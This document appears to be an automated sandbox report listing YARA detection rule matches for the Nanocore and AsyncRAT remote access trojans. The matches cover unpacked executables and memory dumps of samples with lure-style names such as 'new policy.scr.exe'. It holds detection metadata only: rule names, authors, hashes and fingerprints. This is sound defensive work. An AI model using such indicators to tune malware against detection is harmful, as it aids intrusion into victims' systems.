Source: 3.2.new policy.scr.exe.7980000.27.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.7980000.27.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.7760000.16.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.7760000.16.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.7760000.16.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.43f7444.9.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.43f7444.9.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.43f7444.9.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.4550e57.7.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.4550e57.7.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.4550e57.7.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.795e8a4.26.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.795e8a4.26.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.795e8a4.26.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.4559c86.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.4559c86.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.4559c86.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.4405860.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.4405860.6.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.4405860.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.7954c9f.24.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.7954c9f.24.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.7954c9f.24.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 6.2.Networks!.exe.60b5958.13.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 6.2.Networks!.exe.60b5958.13.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.Networks!.exe.60b5958.13.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.Networks!.exe.60b5958.13.unpack, type: UNPACKEDPE Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.Networks!.exe.60b5958.13.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.328f8ec.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.328f8ec.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 3.2.new policy.scr.exe.328f8ec.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.328f8ec.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.3255830.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.3255830.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 3.2.new policy.scr.exe.3255830.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.3255830.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000003.00000002.2867271024.0000000007760000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.2867271024.0000000007760000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000002.2867271024.0000000007760000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000003.00000002.2867912424.00000000077B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.2867912424.00000000077B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000002.2867912424.00000000077B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000006.00000002.2239294193.0000000006173000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000006.00000002.2239294193.0000000006173000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000006.00000002.2239294193.0000000006173000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000002.1877031081.000000000428C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000000.00000002.1877031081.000000000428C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000002.1877031081.000000000428C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.2868662775.0000000007920000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.2868662775.0000000007920000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detects the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000002.2868662775.0000000007920000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000003.00000002.2866783271.0000000007720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.2866783271.0000000007720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detects the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000002.2866783271.0000000007720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000003.00000002.2858338720.0000000005980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.2858338720.0000000005980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detects the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000002.2858338720.0000000005980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000003.00000002.2869659382.0000000007930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.2869659382.0000000007930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detects the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000002.2869659382.0000000007930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000006.00000002.2239294193.000000000607A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000006.00000002.2239294193.000000000607A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000006.00000002.2239294193.000000000607A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.2866874996.0000000007730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.2866874996.0000000007730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detects the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000002.2866874996.0000000007730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000002.00000000.1859765201.0000000000282000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000007.00000002.2327789577.0000000005D23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000007.00000002.2327789577.0000000005D23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000002.2327789577.0000000005D23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.2852023359.00000000043F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000002.1869683888.000000000322A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000003.00000002.2868258629.00000000077D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.2868258629.00000000077D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detects the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000002.2868258629.00000000077D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000003.00000002.2867384377.0000000007770000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.2867384377.0000000007770000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detects the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000002.2867384377.0000000007770000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000003.00000002.2858583023.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
